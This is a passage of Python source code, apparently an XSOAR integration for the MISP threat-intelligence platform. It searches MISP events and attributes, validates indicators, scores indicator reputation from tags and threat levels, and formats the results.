'date': 'CreationDate',
'info': 'Info',
'published': 'Published',
'attribute_count': 'AttributeCount',
'proposal_email_lock': 'ProposalEmailLock',
'locked': 'Locked',
'publish_timestamp': 'PublishTimestamp',
'event_creator_email': 'EventCreatorEmail',
'name': 'Name',
'analysis': 'Analysis',
'threat_level_id': 'ThreatLevelID',
'old_id': 'OldID',
'org_id': 'OrganizationID',
'Org': 'Organization',
'Orgc': 'OwnerOrganization',
'orgc_uuid': 'OwnerOrganization.UUID',
'orgc_id': 'OwnerOrganization.ID',
'orgc_name': 'OwnerOrganization.Name',
'event_uuid': 'EventUUID',
'proposal_to_delete': 'ProposalToDelete',
'description': 'Description',
'version': 'Version',
'Object': 'Object',
'object_id': 'ObjectID',
'object_relation': 'ObjectRelation',
'template_version': 'TemplateVersion',
'template_uuid': 'TemplateUUID',
'meta-category': 'MetaCategory',
'decay_score': 'DecayScore',
'first_seen': 'first_seen',
'last_seen': 'last_seen',
'provider': 'Provider',
'source_format': 'SourceFormat',
'url': 'URL',
'event_uuids': 'EventUUIDS',
}
MISP_ANALYSIS_TO_IDS = {
'initial': 0,
'ongoing': 1,
'completed': 2
}
MISP_DISTRIBUTION_TO_IDS = {
'Your_organization_only': 0,
'This_community_only': 1,
'Connected_communities': 2,
'All_communities': 3,
'Inherit_event': 5
}
SIGHTING_TYPE_NAME_TO_ID = {
'sighting': 0,
'false_positive': 1,
'expiration': 2
}
SIGHTING_TYPE_ID_TO_NAME = {
'0': 'sighting',
'1': 'false_positive',
'2': 'expiration'
}
INDICATOR_TYPE_TO_DBOT_SCORE = {
'FILE': DBotScoreType.FILE,
'URL': DBotScoreType.URL,
'DOMAIN': DBotScoreType.DOMAIN,
'IP': DBotScoreType.IP,
'EMAIL': DBotScoreType.EMAIL,
}
DOMAIN_REGEX = (
r"([a-z¡-\uffff0-9](?:[a-z¡-\uffff0-9-]{0,61}"
"[a-z¡-\uffff0-9])?(?:\\.(?!-)[a-z¡-\uffff0-9-]{1,63}(?<!-))*"
"\\.(?!-)(?!(jpg|jpeg|exif|tiff|tif|png|gif|otf|ttf|fnt|dtd|xhtml|css"
"|html)$)(?:[a-z¡-\uffff-]{2,63}|xn--[a-z0-9]{1,59})(?<!-)\\.?$"
"|localhost)"
)
MISP_SEARCH_ARGUMENTS = [
'value',
'type',
'category',
'org',
'tags',
'from',
'to',
'event_id',
'uuid',
'to_ids',
'last',
'include_decay_score',
'include_sightings',
'include_correlations',
'limit',
'page',
'enforceWarninglist',
'include_feed_correlations',
]
EVENT_FIELDS = [
'id',
'orgc_id',
'org_id',
'date',
'threat_level_id',
'info',
'published',
'uuid',
'analysis',
'attribute_count',
'timestamp',
'distribution',
'proposal_email_lock',
'locked',
'publish_timestamp',
'sharing_group_id',
'disable_correlation',
'event_creator_email',
'Org',
'Orgc',
'RelatedEvent',
'Galaxy',
'Tag',
'decay_score',
'Object',
'Feed',
]
ATTRIBUTE_FIELDS = [
'id',
'event_id',
'object_id',
'object_relation',
'category',
'type',
'to_ids',
'uuid',
'timestamp',
'distribution',
'sharing_group_id',
'comment',
'deleted',
'disable_correlation',
'first_seen',
'last_seen',
'value',
'Event',
'Object',
'Galaxy',
'Tag',
'decay_score',
'Sighting',
]
def extract_error(error: list) -> List[dict]:
"""
Extracting errors raised by PyMISP into a readable response. For more information and examples,
please see the unit test: test_extract_error.
Args:
error: list of responses from error section
Returns:
List[Dict[str, any]]: filtered response
"""
return [{
'code': err[0],
'message': err[1].get('message'),
'errors': err[1].get('errors')
} for err in error]
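# Shape sketch (hypothetical PyMISP error tuple, for illustration only):
# extract_error([(403, {'message': 'Forbidden', 'errors': 'no perms'})])
# -> [{'code': 403, 'message': 'Forbidden', 'errors': 'no perms'}]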
def dict_to_generic_object_format(args: dict) -> List[dict]:
"""
Converts an args dict into a list. Please see the GenericObjectGenerator class in PyMISP.
Args:
args: dictionary describes MISP object
Returns:
list: list containing dicts that GenericObjectGenerator can take.
Examples:
>>> {'ip': '8.8.8.8', 'domain': 'google.com'}
[{'ip': '8.8.8.8'}, {'domain': 'google.com'}]
"""
return [{k: v} for k, v in args.items()]
def build_generic_object(template_name: str, args: List[dict]) -> GenericObjectGenerator:
"""
Args:
template_name: template name as described in https://github.com/MISP/misp-objects
args: arguments to create the generic object
Returns:
GenericObjectGenerator: object created in MISP
Example:
args should look like:
[{'analysis_submitted_at': '2018-06-15T06:40:27'},
{'threat_score': {value=95, to_ids=False}},
{'permalink': 'https://panacea.threatgrid.com/mask/samples/2e445ef5389d8b'},
{'heuristic_raw_score': 7.8385159793597}, {'heuristic_score': 96},
{'original_filename': 'juice.exe'}, {'id': '2e445ef5389d8b'}] # guardrails-disable-line
"""
misp_object = GenericObjectGenerator(template_name)
misp_object.generate_attributes(args)
return misp_object
def misp_convert_timestamp_to_date_string(timestamp: Union[str, int]) -> str:
"""
Gets a timestamp from MISP response (1546713469) and converts it to human readable format
"""
return datetime.utcfromtimestamp(int(timestamp)).strftime('%Y-%m-%dT%H:%M:%SZ') if timestamp else ""
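# For instance, misp_convert_timestamp_to_date_string(1546713469) returns
# '2019-01-05T18:37:49Z' (UTC), and a falsy timestamp returns ''.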
def replace_keys_from_misp_to_context_data(obj_to_build: Union[dict, list, str]) -> Union[dict, list, str]:
"""
Replacing keys from MISP's format with Demisto's (as they appear in MISP_ENTITIES_TO_CONTEXT_DATA)
Args:
obj_to_build (Union[dict, list, str]): object to replace keys in
Returns:
Union[dict, list, str]: same object type that got in
"""
if isinstance(obj_to_build, list):
return [replace_keys_from_misp_to_context_data(item) for item in obj_to_build]
if isinstance(obj_to_build, dict):
return {
(MISP_ENTITIES_TO_CONTEXT_DATA[key] if key in MISP_ENTITIES_TO_CONTEXT_DATA else key):
replace_keys_from_misp_to_context_data(value) for key, value in obj_to_build.items()
}
return obj_to_build
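# Illustration (hypothetical input): keys found in MISP_ENTITIES_TO_CONTEXT_DATA
# are renamed recursively while unknown keys pass through unchanged, e.g.
# replace_keys_from_misp_to_context_data({'event_id': '42', 'to_ids': True, 'foo': 1})
# -> {'EventID': '42', 'ToIDs': True, 'foo': 1}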
def reputation_command_to_human_readable(outputs, score, events_to_human_readable):
found_tag_id, found_tag_name = "", ""
for event in events_to_human_readable:
# removing those fields as they are shared by the events
found_tag_id = event.pop('Tag_ID')
found_tag_name = event.pop('Tag_Name')
return {
'Attribute Type': outputs[0].get('Type'),
'Dbot Score': score,
'Attribute Value': outputs[0].get('Value'),
'Attribute Category': outputs[0].get('Category'),
'Timestamp': outputs[0].get('Timestamp'),
'Events with the scored tag': events_to_human_readable,
'Scored Tag ID': found_tag_id,
'Scored Tag Name': found_tag_name,
}
def limit_tag_output_to_id_and_name(attribute_dict, is_event_level):
"""
As the tag list can be full of unnecessary data, we want to limit it to include only the ID and Name fields.
In addition, returns a set of the found tag ids.
Some tags have a field called 'inherited'. When it is set to 1, the tag is an event's tag.
Otherwise (when it is set to 0 or does not exist) the tag is an attribute's tag.
If the data is an event's (is_event_level = true) we add all the tags to tag_set_ids
(the event's own tags and its attributes' tags, as they are part of the event scope).
If the data is an attribute's (is_event_level = false) and the tag is related only to the attribute,
we add it to tag_set_ids. In any other case, the tag is not added.
Args:
attribute_dict (dict): The dictionary that includes the tag list.
is_event_level (bool): Whether the attribute_dict was received from an event object,
meaning the tags are event's ones. Otherwise, the data is attribute's (attribute tags).
"""
output = []
tag_set_ids = set()
tags_list = attribute_dict.get('Tag', [])
for tag in tags_list:
is_event_tag = tag.get('inherited', 0) # field doesn't exist when this is an attribute level, default is '0'
tag_id = tag.get('id')
if is_event_level:
tag_set_ids.add(tag_id)
else: # attribute level
if not is_event_tag:
tag_set_ids.add(tag_id)
output.append({'ID': tag_id, 'Name': tag.get('name')})
return output, tag_set_ids
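# Worked example (hypothetical tag payload): at event level every tag id is
# collected, so
# limit_tag_output_to_id_and_name({'Tag': [{'id': '7', 'name': 'tlp:red', 'inherited': 1}]}, True)
# -> ([{'ID': '7', 'Name': 'tlp:red'}], {'7'})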
def parse_response_reputation_command(misp_response, malicious_tag_ids, suspicious_tag_ids, attributes_limit):
"""
After getting all the attributes that match the required indicator value, this function parses the response.
It goes over all the attributes that were found (after limiting the attribute amount to the given limit)
and, via sub-functions, calculates the score of the indicator.
For the context data outputs, for every attribute we remove the "RelatedAttribute" list and limit the tag and
galaxy lists. Eventually, the outputs will be a list of attributes along with their event objects.
Note: when limiting the attribute amount, we sort the attributes list by event id, as greater event ids are
the newer ones.
Returns:
response (dict): The parsed outputs to context data (array of attributes).
score: the indicator score
found_tag: the tag (id) which made the indicator get that score
found_related_events (dict): contains info (name, id, threat level id) about all the events that include
the indicator
Please see an example for a response in test_data/reputation_command_response.json
Please see an example for a parsed output in test_data/reputation_command_outputs.json
"""
response = copy.deepcopy(misp_response)
attributes_list = response.get('Attribute')
if not attributes_list:
return None
attributes_list = sorted(attributes_list,
key=lambda attribute_item: attribute_item['event_id'], reverse=True)[:attributes_limit]
found_related_events, attributes_tag_ids, event_tag_ids = prepare_attributes_array_to_context_data(attributes_list)
attribute_in_event_with_bad_threat_level = found_event_with_bad_threat_level_id(found_related_events)
score, found_tag = get_score(attribute_tags_ids=attributes_tag_ids, event_tags_ids=event_tag_ids,
malicious_tag_ids=malicious_tag_ids, suspicious_tag_ids=suspicious_tag_ids,
is_attribute_in_event_with_bad_threat_level=attribute_in_event_with_bad_threat_level)
formatted_response = replace_keys_from_misp_to_context_data({'Attribute': attributes_list})
return formatted_response, score, found_tag, found_related_events
def prepare_attributes_array_to_context_data(attributes_list):
attributes_tag_ids, event_tag_ids = set(), set()
found_related_events = {}
if not attributes_list:
return None
for attribute in attributes_list:
attribute.pop("RelatedAttribute") # get rid of this useless list
event = attribute.get('Event')
convert_timestamp_to_readable(attribute, event)
found_related_events[event.get("id")] = {"Event Name": event.get("info"),
"Threat Level ID": event.get('threat_level_id'),
"Event ID": event.get("id")}
if event.get('Tag'):
limit_tag_output, tag_ids = limit_tag_output_to_id_and_name(event, True)
event['Tag'] = limit_tag_output
event_tag_ids.update(tag_ids)
if attribute.get('Tag'):
limit_tag_output, tag_ids = limit_tag_output_to_id_and_name(attribute, False)
attribute['Tag'] = limit_tag_output
attributes_tag_ids.update(tag_ids)
return found_related_events, attributes_tag_ids, event_tag_ids
def convert_timestamp_to_readable(attribute, event):
if attribute.get('timestamp'):
attribute['timestamp'] = misp_convert_timestamp_to_date_string(attribute.get('timestamp'))
if event:
if event.get('timestamp'):
attribute['Event']['timestamp'] = misp_convert_timestamp_to_date_string(event.get('timestamp'))
if event.get('publish_timestamp'):
attribute['Event']['publish_timestamp'] = misp_convert_timestamp_to_date_string(
event.get('publish_timestamp'))
def found_event_with_bad_threat_level_id(found_related_events):
bad_threat_level_ids = ["1", "2", "3"]
for event in found_related_events.values():
if event['Threat Level ID'] in bad_threat_level_ids:
return True
return False
def get_score(attribute_tags_ids, event_tags_ids, malicious_tag_ids, suspicious_tag_ids,
is_attribute_in_event_with_bad_threat_level):
"""
Calculates the indicator score by the following logic. Indicators of attributes and events that:
* have tags which are configured as malicious will be scored 3 (i.e. malicious).
* have tags which are configured as suspicious will be scored 2 (i.e. suspicious).
* don't have any tags configured as malicious or suspicious will be scored by their event's threat level id. In
that case, the score will be BAD if the threat level id is in [1,2,3]. Otherwise, the threat level is 4 = Unknown.
note:
- In case the same tag appears in both the malicious tag ids and the suspicious tag ids lists, the indicator
will be scored as malicious.
- Attribute tags (both malicious and suspicious) are stronger than event tags.
"""
found_tag = None
is_attribute_tag_malicious = any((found_tag := tag) in attribute_tags_ids for tag in malicious_tag_ids)
if is_attribute_tag_malicious:
return Common.DBotScore.BAD, found_tag
is_attribute_tag_suspicious = any((found_tag := tag) in attribute_tags_ids for tag in suspicious_tag_ids)
if is_attribute_tag_suspicious:
return Common.DBotScore.SUSPICIOUS, found_tag
is_event_tag_malicious = any((found_tag := tag) in event_tags_ids for tag in malicious_tag_ids)
if is_event_tag_malicious:
return Common.DBotScore.BAD, found_tag
is_event_tag_suspicious = any((found_tag := tag) in event_tags_ids for tag in suspicious_tag_ids)
if is_event_tag_suspicious:
return Common.DBotScore.SUSPICIOUS, found_tag
# no tag was found
if is_attribute_in_event_with_bad_threat_level:
return Common.DBotScore.BAD, None
return Common.DBotScore.NONE, None
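# Worked example (hypothetical tag ids): attribute tags outrank event tags, so
# get_score(attribute_tags_ids={'3'}, event_tags_ids={'9'}, malicious_tag_ids={'3'},
#           suspicious_tag_ids={'9'}, is_attribute_in_event_with_bad_threat_level=False)
# returns (Common.DBotScore.BAD, '3') even though the event carries a suspicious tag.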
def get_new_misp_event_object(args):
"""
Create a new MISP event object and set the event's details.
"""
event = MISPEvent()
event.distribution = MISP_DISTRIBUTION_TO_IDS[args.get('distribution')]
threat_level_id_arg = args.get('threat_level_id')
if threat_level_id_arg:
event.threat_level_id = THREAT_LEVELS_TO_ID[threat_level_id_arg]
analysis_arg = args.get('analysis')
event.analysis = MISP_ANALYSIS_TO_IDS.get(analysis_arg) if analysis_arg in MISP_ANALYSIS_TO_IDS else analysis_arg
event.info = args.get('info') if args.get('info') else 'Event from XSOAR'
event.date = datetime.today()
event.published = argToBoolean(args.get('published', 'False'))
return event
def create_event_command(demisto_args: dict):
"""Creating event in MISP with the given attribute args"""
new_event = get_new_misp_event_object(demisto_args)
new_event = PYMISP.add_event(new_event, True)
if isinstance(new_event, dict) and new_event.get('errors'):
raise DemistoException(new_event.get('errors'))
event_id = new_event.id
add_attribute(event_id=event_id, internal=True, new_event=new_event, demisto_args=demisto_args)
event = PYMISP.search(eventid=event_id)
human_readable = f"## MISP create event\nNew event with ID: {event_id} has been successfully created.\n"
return CommandResults(
readable_output=human_readable,
outputs_prefix='MISP.Event',
outputs_key_field='ID',
outputs=build_events_search_response(event),
raw_response=event
)
def add_attribute(event_id: int = None, internal: bool = False, demisto_args: dict = {}, new_event: MISPEvent = None):
"""Adding attribute to a given MISP event object
This function can be called as an independence command or as part of another command (create event for example)
Args:
event_id (int): Event ID to add attribute to
internal (bool): if set to True, will not post results to Demisto
demisto_args (dict): Demisto args
new_event (MISPEvent): When this function was called from create event command, the attrubite will be added to
that existing event.
"""
attributes_args = {
'id': demisto_args.get('event_id'), # misp event id
'type': demisto_args.get('type', 'other'),
'category': demisto_args.get('category', 'External analysis'),
'to_ids': argToBoolean(demisto_args.get('to_ids', True)),
'comment': demisto_args.get('comment'),
'value': demisto_args.get('value')
}
event_id = event_id if event_id else arg_to_number(demisto_args.get('event_id'), "event_id")
attributes_args.update({'id': event_id}) if event_id else None
distribution = demisto_args.get('distribution')
attributes_args.update({'distribution': MISP_DISTRIBUTION_TO_IDS[distribution]}) if distribution else None
if not new_event:
response = PYMISP.search(eventid=event_id, pythonify=True)
if not response:
raise DemistoException(
f"Error: An event with the given id: {event_id} was not found in MISP. Please check it once again")
new_event = response[0] # response[0] is MISP event
new_event.add_attribute(**attributes_args)
PYMISP.update_event(event=new_event)
if internal:
return
value = attributes_args.get('value')
updated_event = PYMISP.search(eventid=new_event.id, controller='attributes', value=value)
human_readable = f"## MISP add attribute\nNew attribute: {value} was added to event id {new_event.id}.\n"
return CommandResults(
readable_output=human_readable,
outputs_prefix='MISP.Attribute',
outputs_key_field='ID',
outputs=build_attributes_search_response(updated_event),
raw_response=updated_event
)
def generic_reputation_command(demisto_args, reputation_type, dbot_type, malicious_tag_ids, suspicious_tag_ids,
reliability, attributes_limit):
reputation_value_list = argToList(demisto_args.get(reputation_type), ',')
command_results = []
for value in reputation_value_list:
command_results.append(
get_indicator_results(value, dbot_type, malicious_tag_ids, suspicious_tag_ids, reliability,
attributes_limit))
return command_results
def reputation_value_validation(value, dbot_type):
if dbot_type == 'FILE':
# hashFormat will be used only in output
hash_format = get_hash_type(value)
if hash_format == 'Unknown':
raise DemistoException('Invalid hash length, enter file hash of format MD5, SHA-1 or SHA-256')
if dbot_type == 'IP':
if not is_ip_valid(value):
raise DemistoException(f"Error: The given IP address: {value} is not valid")
if dbot_type == 'DOMAIN':
if not re.compile(DOMAIN_REGEX, regexFlags).match(value):
raise DemistoException(f"Error: The given domain: {value} is not valid")
if dbot_type == 'URL':
if not re.compile(urlRegex, regexFlags).match(value):
raise DemistoException(f"Error: The given url: {value} is not valid")
if dbot_type == 'EMAIL':
if not re.compile(emailRegex, regexFlags).match(value):
raise DemistoException(f"Error: The given email address: {value} is not valid")
def get_indicator_results(value, dbot_type, malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit):
"""
This function searches for the given attribute value in MISP and then calculates its dbot score.
The score is calculated by the tags ids (attribute tags and event tags).
Args:
value (str): The indicator value (an IP address, email address, domain, url or file hash).
dbot_type (str): Indicator type (file, url, domain, email or ip).
malicious_tag_ids (set): Tag ids that should be recognised as malicious.
suspicious_tag_ids (set): Tag ids that should be recognised as suspicious.
reliability (DBotScoreReliability): integration reliability score.
attributes_limit (int) : Limits the number of attributes that will be written to the context
Returns:
CommandResults includes all the indicator results.
"""
reputation_value_validation(value, dbot_type)
misp_response = PYMISP.search(value=value, controller='attributes', include_context=True,
include_correlations=True, include_event_tags=True, enforce_warninglist=True,
include_decay_score=True, includeSightings=True)
indicator_type = INDICATOR_TYPE_TO_DBOT_SCORE[dbot_type]
is_indicator_found = misp_response and misp_response.get('Attribute')
if is_indicator_found:
outputs, score, found_tag, found_related_events = parse_response_reputation_command(misp_response,
malicious_tag_ids,
suspicious_tag_ids,
attributes_limit)
dbot = Common.DBotScore(indicator=value, indicator_type=indicator_type,
score=score, reliability=reliability, malicious_description="Match found in MISP")
indicator = get_dbot_indicator(dbot_type, dbot, value)
all_attributes = outputs.get('Attribute')
events_to_human_readable = get_events_related_to_scored_tag(all_attributes, found_tag)
attribute_highlights = reputation_command_to_human_readable(all_attributes, score, events_to_human_readable)
readable_output = tableToMarkdown(f'Results found in MISP for value: {value}', attribute_highlights,
removeNull=True)
readable_output += tableToMarkdown('Related events', list(found_related_events.values()))
return CommandResults(indicator=indicator,
raw_response=misp_response,
outputs=all_attributes,
outputs_prefix='MISP.Attribute',
outputs_key_field='ID',
readable_output=readable_output)
else:
dbot = Common.DBotScore(indicator=value, indicator_type=indicator_type,
score=Common.DBotScore.NONE, reliability=reliability,
malicious_description="No results were found in MISP")
indicator = get_dbot_indicator(dbot_type, dbot, value)
return CommandResults(indicator=indicator,
readable_output=f"No attributes found in MISP for value: {value}")
def get_events_related_to_scored_tag(all_attributes, found_tag):
"""
This function searches for all the events that have the tag (i.e. found_tag) which caused the indicator to be
scored as malicious or suspicious.
Args:
all_attributes (dict): The parsed response from the MISP search attribute request
found_tag (str): The tag that was scored as malicious or suspicious. If no tag was found, then the score is
Unknown so no events should be found.
Returns:
list includes all the events that were detected as related to the tag.
"""
scored_events = []
if found_tag:
for attribute in all_attributes:
event = attribute.get('Event', {})
event_name = event.get('Info')
scored_events.extend(search_events_with_scored_tag(event, found_tag, event_name))
scored_events.extend(search_events_with_scored_tag(attribute, found_tag, event_name))
return remove_duplicated_related_events(scored_events)
def remove_duplicated_related_events(related_events):
related_events_no_duplicates = []
for i in range(len(related_events)):
if related_events[i] not in related_events[i + 1:]:
related_events_no_duplicates.append(related_events[i])
return related_events_no_duplicates
def search_events_with_scored_tag(object_data_dict, found_tag, event_name):
"""
For the given object, we go over all the tags and check whether found_tag is one of its tags. If so, the event
will be added to the related_events list.
Args:
object_data_dict (dict): Event or attribute dict which includes tags list.
found_tag (str): The tag that was scored as malicious or suspicious.
event_name (str): Name of the event
"""
related_events = []
object_tags_list = object_data_dict.get('Tag', [])
for tag in object_tags_list:
if tag.get('ID') == found_tag:
event_id = get_event_id(object_data_dict)
tag_name = tag.get('Name')
related_events.append({'Event_ID': event_id, 'Event_Name': event_name,
'Tag_Name': tag_name, 'Tag_ID': tag.get('ID')})
return related_events
def get_event_id(data_dict):
if data_dict.get('EventID'):
return data_dict.get('EventID')
elif data_dict.get('ID'):
return data_dict.get('ID')
return data_dict.get('Event', {}).get('ID')
def get_dbot_indicator(dbot_type, dbot_score, value):
if dbot_type == "FILE":
hash_type = get_hash_type(value)
if hash_type == 'md5':
return Common.File(dbot_score=dbot_score, md5=value)
if hash_type == 'sha1':
return Common.File(dbot_score=dbot_score, sha1=value)
if hash_type == 'sha256':
return Common.File(dbot_score=dbot_score, sha256=value)
if dbot_type == "IP":
return Common.IP(ip=value, dbot_score=dbot_score)
if dbot_type == "DOMAIN":
return Common.Domain(domain=value, dbot_score=dbot_score)
if dbot_type == "EMAIL":
return Common.EMAIL(address=value, dbot_score=dbot_score)
if dbot_type == "URL":
return Common.URL(url=value, dbot_score=dbot_score)
def build_misp_complex_filter(demisto_query: str):
"""
Examples are available in UT: test_build_misp_complex_filter.
For more information please see build_complex_query in pymisp/api.py
Args:
demisto_query: complex query contains saved words: 'AND:', 'OR:' and 'NOT:'
using ',' as delimiter for parameters and ';' as delimiter for operators.
using the operators is optional.
if 'demisto_query' does not contains any of the complex operators the original
input will be returned
Returns:
str: dictionary created for misp to perform complex query
or if no complex query found returns the original input
"""
regex_and = r'(AND:)([^\;]+)(;)?'
regex_or = r'(OR:)([^\;]+)(;)?'
regex_not = r'(NOT:)([^\;]+)(;)?'
misp_query_params = dict()
match_and = re.search(regex_and, demisto_query, re.MULTILINE)
match_or = re.search(regex_or, demisto_query, re.MULTILINE)
match_not = re.search(regex_not, demisto_query, re.MULTILINE)
is_complex_and_operator = is_misp_complex_search_helper(match_and, misp_query_params, 'and_parameters')
is_complex_or_operator = is_misp_complex_search_helper(match_or, misp_query_params, 'or_parameters')
is_complex_not_operator = is_misp_complex_search_helper(match_not, misp_query_params, 'not_parameters')
is_complex_search = is_complex_and_operator or is_complex_or_operator or is_complex_not_operator
if is_complex_search:
return PYMISP.build_complex_query(**misp_query_params)
return demisto_query
def is_misp_complex_search_helper(match_operator, misp_query_params, operator_key):
is_complex_search = False
if match_operator is not None:
misp_query_params[operator_key] = match_operator.group(2).split(',')
is_complex_search = True
return is_complex_search
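# Illustration (hypothetical query string): 'AND:tag1,tag2;NOT:tag3' is parsed
# into PYMISP.build_complex_query(and_parameters=['tag1', 'tag2'], not_parameters=['tag3']),
# while a query without AND:/OR:/NOT: operators is returned unchanged.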
def prepare_args_to_search(controller):
demisto_args = demisto.args()
args_to_misp_format = {arg: demisto_args[arg] for arg in MISP_SEARCH_ARGUMENTS if arg in demisto_args}
# Replacing keys and values from Demisto to Misp's keys
if 'type' in args_to_misp_format:
args_to_misp_format['type_attribute'] = args_to_misp_format.pop('type')
if 'to_ids' in args_to_misp_format:
args_to_misp_format['to_ids'] = 1 if demisto_args.get('to_ids') == 'true' else 0
if 'from' in args_to_misp_format:
args_to_misp_format['date_from'] = args_to_misp_format.pop('from')
if 'to' in args_to_misp_format:
args_to_misp_format['date_to'] = args_to_misp_format.pop('to')
if 'event_id' in args_to_misp_format:
args_to_misp_format['eventid'] = argToList(args_to_misp_format.pop('event_id'))
if 'last' in args_to_misp_format:
args_to_misp_format['publish_timestamp'] = args_to_misp_format.pop('last')
if 'include_decay_score' in args_to_misp_format:
args_to_misp_format['include_decay_score'] = 1 if demisto_args.get('include_decay_score') == 'true' else 0
if 'include_sightings' in args_to_misp_format:
args_to_misp_format['include_sightings'] = 1 if demisto_args.get('include_sightings') == 'true' else 0
if 'include_correlations' in args_to_misp_format:
args_to_misp_format['include_correlations'] = 1 if demisto_args.get('include_correlations') == 'true' else 0
if 'enforceWarninglist' in args_to_misp_format:
args_to_misp_format['enforceWarninglist'] = 1 if demisto_args.get('enforceWarninglist') == 'true' else 0
if 'include_feed_correlations' in args_to_misp_format:
args_to_misp_format['includeFeedCorrelations'] = 1 if demisto_args.get(
'include_feed_correlations') == 'true' else 0
args_to_misp_format.pop('include_feed_correlations')
if 'limit' not in args_to_misp_format:
args_to_misp_format['limit'] = '50'
if 'tags' in args_to_misp_format:
args_to_misp_format['tags'] = build_misp_complex_filter(args_to_misp_format['tags'])
args_to_misp_format['controller'] = controller
demisto.debug(f"[MISP V3]: args for {demisto.command()} command are {args_to_misp_format}")
return args_to_misp_format
def build_attributes_search_response(response: Union[dict, requests.Response],
include_correlations=False) -> dict:
"""
Convert the response of attribute search returned from MISP to the context output format.
"""
response_object = copy.deepcopy(response)
if include_correlations:
# return full related attributes only if the user wants to get them back
ATTRIBUTE_FIELDS.append('RelatedAttribute')
if isinstance(response_object, str):
response_object = json.loads(json.dumps(response_object))
attributes = response_object.get('Attribute')
return get_limit_attribute_search_outputs(attributes)
def get_limit_attribute_search_outputs(attributes):
for i in range(len(attributes)):
attributes[i] = {key: attributes[i].get(key) for key in ATTRIBUTE_FIELDS if key in attributes[i]}
build_galaxy_output(attributes[i])
build_tag_output(attributes[i])
build_sighting_output_from_attribute_search_response(attributes[i])
convert_timestamp_to_readable(attributes[i], None)
formatted_attributes = replace_keys_from_misp_to_context_data(attributes)
return formatted_attributes
def build_galaxy_output(given_object):
"""given_object is attribute or event, depends on the called function"""
if given_object.get('Galaxy'):
given_object['Galaxy'] = [
{
'name': star.get('name'),
'type': star.get('type'),
'description': star.get('description')
} for star in given_object['Galaxy']
]
def build_object_output(event):
if event.get('Object'):
event['Object'] = [
{
'name': event_object.get('name'),
'uuid': event_object.get('uuid'),
'description': event_object.get('description'),
'id': event_object.get('id')
} for event_object in event['Object']
]
def build_tag_output(given_object):
"""given_object is attribute or event, depends on the called function"""
if given_object.get('Tag'):
given_object['Tag'] = [
{'Name': tag.get('name'),
'is_galaxy': tag.get('is_galaxy')
} for tag in given_object.get('Tag')
]
def build_sighting_output_from_attribute_search_response(attribute):
if attribute.get('Sighting'):
attribute['Sighting'] = [
{'type': sighting.get('type')
} for sighting in attribute.get('Sighting')
]
def build_attributes_search_response_return_only_values(response_object: Union[dict, requests.Response]) -> list:
"""returns list of attributes' values that match the search query when user set the arg 'compact' to True"""
if isinstance(response_object, str):
response_object = json.loads(json.dumps(response_object))
attributes = response_object.get('Attribute')
return [attribute.get('value') for attribute in attributes]
def pagination_args_validation(page, limit):
if page and page < 0:
raise DemistoException("page should be zero or a positive number")
if limit and limit < 0:
raise DemistoException("limit should be zero or a positive number")
def attribute_response_to_markdown_table(response: dict):
attribute_highlights = []
for attribute in response:
event = attribute.get('Event', {})
attribute_tags = [tag.get('Name') for tag in attribute.get('Tag')] if attribute.get(
'Tag') else None
attribute_sightings = [SIGHTING_TYPE_ID_TO_NAME[sighting.get('Type')] for sighting in
attribute.get('Sighting')] if attribute.get('Sighting') else None
attribute_highlights.append({
'Attribute ID': attribute.get('ID'),
'Event ID': attribute.get('EventID'),
'Attribute Category': attribute.get('Category'),
'Attribute Type': attribute.get('Type'),
'Attribute Comment': attribute.get('Comment'),
'Attribute Value': attribute.get('Value'),
'Attribute Tags': attribute_tags,
'Attribute Sightings': attribute_sightings,
'To IDs': attribute.get('ToIDs'),
'Timestamp': attribute.get('Timestamp'),
'Event Info': event.get('Info'),
'Event Organization ID': event.get('OrganizationID'),
'Event Distribution': event.get('Distribution'),
'Event UUID': event.get('UUID')
})
return attribute_highlights
def search_attributes(demisto_args: dict) -> CommandResults:
"""Execute a MISP search over 'attributes'"""
args = prepare_args_to_search('attributes')
outputs_should_include_only_values = argToBoolean(demisto_args.get('compact', False))
include_correlations = argToBoolean(demisto_args.get('include_correlations', False))
page = arg_to_number(demisto_args.get('page', 1), "page", required=True)
limit = arg_to_number(demisto_args.get('limit', 50), "limit", required=True)
pagination_args_validation(page, limit)
response = PYMISP.search(**args)
if response:
if outputs_should_include_only_values:
response_for_context = build_attributes_search_response_return_only_values(response)
number_of_results = len(response_for_context)
md = tableToMarkdown(f"MISP search-attributes returned {number_of_results} attributes",
response_for_context[:number_of_results], ["Value"])
else:
response_for_context = build_attributes_search_response(response, include_correlations)
attribute_highlights = attribute_response_to_markdown_table(response_for_context)
pagination_message = f"Current page size: {limit}\n"
if len(response_for_context) == limit:
pagination_message += f"Showing page {page} out others that may exist"
else:
pagination_message += f"Showing page {page}"
md = tableToMarkdown(
f"MISP search-attributes returned {len(response_for_context)} attributes\n {pagination_message}",
attribute_highlights, removeNull=True)
return CommandResults(
raw_response=response,
readable_output=md,
outputs=response_for_context,
outputs_prefix="MISP.Attribute",
outputs_key_field="ID"
)
else:
return CommandResults(readable_output=f"No attributes found in MISP for the given filters: {args}")
def build_events_search_response(response: Union[dict, requests.Response]) -> dict:
"""
Convert the response of event search returned from MISP to the context output format.
Please note: attributes are excluded from the search-events output as the information is too big. The user can use
the search-attributes command in order to get the information about the attributes.
"""
response_object = copy.deepcopy(response)
if isinstance(response_object, str):
response_object = json.loads(json.dumps(response_object))
events = [event.get('Event') for event in response_object]
for i in range(0, len(events)):
# Filter object from keys in event_args
events[i] = {key: events[i].get(key) for key in EVENT_FIELDS if key in events[i]}
events[i]['RelatedEvent'] = [] # there is no need in returning related event when searching for an event
build_galaxy_output(events[i])
build_tag_output(events[i])
build_object_output(events[i])
events[i]['timestamp'] = misp_convert_timestamp_to_date_string(events[i].get('timestamp'))
events[i]['publish_timestamp'] = misp_convert_timestamp_to_date_string(events[i].get('publish_timestamp'))
formatted_events = replace_keys_from_misp_to_context_data(events) # type: ignore
return formatted_events # type: ignore
def event_to_human_readable_tag_list(event):
event_tags = event.get('Tag', [])
if event_tags:
return [tag.get('Name') for tag in event_tags]
def event_to_human_readable_galaxy_list(event):
event_galaxies = event.get('Galaxy', [])
if event_galaxies:
return [galaxy.get('Name') for galaxy in event.get('Galaxy')]
def event_to_human_readable_object_list(event):
event_objects = event.get('Object', [])
if event_objects:
return [event_object.get('ID') for event_object in event.get('Object')]
def event_to_human_readable(response: dict):
event_highlights = []
for event in response:
event_tags = event_to_human_readable_tag_list(event)
event_galaxies = event_to_human_readable_galaxy_list(event)
event_objects = event_to_human_readable_object_list(event)
